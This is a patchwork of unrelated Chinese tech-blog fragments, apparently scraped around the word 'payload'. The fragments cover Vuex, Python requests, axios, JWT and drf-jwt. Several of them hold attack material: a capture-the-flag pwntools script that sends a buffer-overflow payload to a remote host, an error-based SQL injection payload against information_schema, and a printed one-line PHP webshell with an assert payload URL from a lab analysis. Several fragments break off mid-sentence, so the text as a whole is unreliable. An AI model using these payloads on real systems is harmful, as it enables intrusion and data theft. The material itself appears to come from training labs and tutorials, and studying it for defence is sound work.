payload

所以题目要求是输入生日1926 from pwn import * io = remote("111.198.29.45",40803) io.recvline() io.sendline('1234') io.recvline() payload = "A"*8 payload += p64(0x786) io.sendline(payload) io.interactive() 解析： 来源： https://www.cnblogs.com/chrysanthemum/p/11764343.html

1.Floor() round() 遵循四舍五入把原值转化为指定小数位数，如：round(1.45,0) = 1;round(1.55,0)=2 floor()向下舍入为指定小数位数 如：floor(1.45,0)= 1;floor(1.55,0) = 1 ceiling()向上舍入为指定小数位数 如：ceiling(1.45,0) = 2;ceiling(1.55,0)=2 floor(x)，返回小于或等于x的最大整数。 x表示concat(database(),rand(0)*2)，rand(0)以0为随机种子产生0-1之间的随机数，*2产生0-2之间的随机数。 报错原因：主键重复，必需：count()、rand()、group by payload: id=1 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.ExtractValue() ExtractValue(xml_frag, xpath_expr) ExtractValue() 接受两个字符串参数，一个XML标记片段 xml_frag 和一个XPath表达式 xpath_expr （也称为 定位器）; 它返回 CDATA

Vuex是一个专为Vue服务，用于管理页面数据状态、提供统一数据操作的生态系统。它集中于MVC模式中的Model层，规定所有的数据操作必须通过 action - mutation - state change 的流程来进行，再结合Vue的数据视图双向绑定特性来实现页面的展示更新。统一的页面状态管理以及操作处理，可以让复杂的组件交互变得简单清晰，同时可在调试模式下进行时光机般的倒退前进操作，查看数据改变过程，使code debug更加方便。 最近在开发的项目中用到了Vuex来管理整体页面状态，遇到了很多问题。决定研究下源码，在答疑解惑之外，能深入学习其实现原理。 先将问题抛出来，使学习和研究更有针对性： 1. 使用Vuex只需执行 Vue.use(Vuex) ，并在Vue的配置中传入一个store对象的示例，store是如何实现注入的？ 2. state内部是如何实现支持模块配置和模块嵌套的？ 3. 在执行dispatch触发action（commit同理）的时候，只需传入（type, payload），action执行函数中第一个参数store从哪里获取的？ 4. 如何区分state是外部直接修改，还是通过mutation方法修改的？ 5. 调试时的“时空穿梭”功能是如何实现的？ 注：本文对有Vuex有实际使用经验的同学帮助更大，能更清晰理解Vuex的工作流程和原理

python requests函数封装方法 上代码 1 import requests 2 import json 3 4 """ 5 封装request请求， 6 1.post：my_post 7 2.get:my_get 8 3.返回code:get_code(res) 9 4.返回json：get_json(res) 10 5.返回text：get_text(res) 11 6.响应时间:get_time(res) 12 7.请求header:get_header(act) 13 9.添加请求头参数:add_header(dict) 14 15 """ 16 17 #--------------------------------------------------- 18 """ 19 r.status_code 20 r.text #页面内容 21 r.encoding #header中的编码方式 22 r.apparent_encoding #备选的编码方式 23 r.content #响应内容的二进制形式 24 timeout= 25 r.elapsed.total_seconds()，单位是s 26 """ 27 #---------------------------------------------------- 28 29 def my_post(url

axios作为Vue生态系统中浓墨重彩的一笔，我学习这个东西也是花了一定的时间的。刚开始的时候，也是遇到了很多问题。 逐渐摸透了它的脾气。 首先说说FormData和Payload两种数据格式的区别： 先是提交一个FormData的请求试试看： 然后我们看后端： 然后我们提交一个以Payload传输数据的请求： 我们再切到后台： 这就是使用axios和jquery ajax最大的区别。 jquery提交数据的时候，默认是以FormData的形式提交的，也就是Content-Type:" application/x-www-form-urlencoded ", 而默认axios是使用的是Payload形式提交数据，也就是Content-Type:"application/json" 如何切换呢，我们需用应用以下方式： [javascript] view plain copy var params = new URLSearchParams(); params.append( 'param1' , 'value1' ); params.append( 'param2' , 'value2' ); 它的意思，其实就是把这样的数据（对象）{ name:"yangxu",age:23 } 转换成这样的数据（字符串） "name=yangxu&age=23"这样的查询字符串。

问题背景： 后端服务对手机APP端开放API，没有基本的校验就是裸奔，别人抓取接口后容易恶意请求，不要求严格的做的安全，但是简单的基础安全屏障是要建立的，再配合HTTPS使用，这样使后端服务尽可能的安全。 对接口安全问题，采用JWT对接口进行token验证，判断请求的有效性，目前对JWT解释的博客文章很多，对JWT不了解的可以查找相关资料， JWT官网 。 JWT是JSON Web Token的简写，一些是JWT官网的解释： 什么是JWT？ JSON Web Token (JWT) is an open standard ( RFC 7519 ) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA or ECDSA. 看不懂的可以用Google翻译：

drf-jwt插件 官网 ? 1 https: / / github.com / jpadilla / django - rest - framework - jwt 安装 ? 1 >: pip3 install djangorestframework - jwt 登录 - 签发token：api/urls.py ? 1 2 3 4 5 6 # ObtainJSONWebToken视图类就是通过username和password得到user对象然后签发token from rest_framework_jwt.views import ObtainJSONWebToken, obtain_jwt_token urlpatterns = [ # url(r'^jogin/$', ObtainJSONWebToken.as_view()), url(r '^jogin/$' , obtain_jwt_token), ] 认证 - 校验token：全局或局部配置drf-jwt的认证类 JSONWebTokenAuthentication ? 1 2 3 4 5 6 7 8 9 10 from rest_framework.views import APIView from utils.response import APIResponse # 必须登录后才能访问 - 通过了认证权限组件

1.安装 ###直接使用pip安装 pip install requests 　###2.1不带参数 #!/usr/bin/python import requests url="http://my.os/notification/charm/" r = requests.get(url) print r.status_code print r.content 为URL传递参数 GET 你也许经常想为URL的查询字符串(query string)传递某种数据。如果你是手工构建URL，那么数据会以键/值 对的形式置于URL中，跟在一个问号的后面。例如， httpbin.org/get?key=val 。 Requests允许你使用 params 关键字参数，以一个字典来提供这些参数。举例来说，如果你想传递 key1=value1 和 key2=value2 到 httpbin.org/get ，那么你可以使用如下代码: >>> payload = {'key1': 'value1', 'key2': 'value2'} >>> r = requests.get("http://httpbin.org/get", params=payload) 　　通过打印输出该URL，你能看到URL已被正确编码: >>> print r.url u'http://httpbin.org/get

深入理解JWT的使用场景和优劣 原创： 徐靖峰 Kirito的技术分享 Kirito的技术分享 微信号 cnkirito 功能介绍 「技术分享」某种程度上，是让作者和读者，不那么孤独的东西。「Kirito的技术分享」致力于探讨 Java 生态的知识点，内容覆盖分布式服务治理，微服务，性能调优，各类源码分析。追求有深度并兼具表达力的文字。 2018-04-20 经过前面两篇文章《JSON Web Token - 在Web应用间安全地传递信息》《八幅漫画理解使用JSON Web Token设计单点登录系统》的科普，相信大家应该已经知道了 JWT 协议是什么了。至少看到 eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJxaWFubWlJZCI6InFtMTAzNTNzaEQiLCJpc3MiOiJhcHBfcW0xMDM1M3NoRCIsInBsYXRmb3JtIjoiYXBwIn0.cMNwyDTFVYMLL4e7ts50GFHTvlSJLDpePtHXzu7z9j4 这样形如 A.B.C 的字符串时能敏感地认出这是使用了 jwt。发了这两篇文章后，有不少读者在文末留言，表达了对 jwt 使用方式的一些疑惑，以及到底哪些场景适合使用 jwt。我并不是 jwt 方面的专家，和不少读者一样，起初研究时我也存在相同疑惑，甚至在逐渐接触后产生了更大的疑惑

WebShell代码分析溯源(一) 一、 一句话变形马样本 <?php $_GET['POST']($_POST['GET']);?> 二、代码分析 1、调整代码格式 <?php $_GET['POST']($_POST['GET']); ?> 2、分析代码，首先以GET方法接收url中POST参数传递的值，然后又以POST方法接收GET参数传递的值，因此可以构造payload:http://www.test.com/test.php?POST=assert,这样就相当于一句话木马变成这样: <?php assert($_POST['GET']);?> 注:不能使用eval,eval与assert的区别: eval函数中参数是字符,eval并不支持可变变量形式 assert函数中参数为表达式 （或者为函数） 参考: https://www.anquanke.com/post/id/173201/ https://blog.csdn.net/whatday/article/details/59168605 三、漏洞环境搭建 1、这里使用在线学习平台墨者学院中的实验环境(WebShell代码分析溯源(第1题))，地址: https://www.mozhe.cn/bug/detail/TkhnOVovVm14KzV6aTN5K2d1dFZ0Zz09bW96aGUmozhe 2、代码环境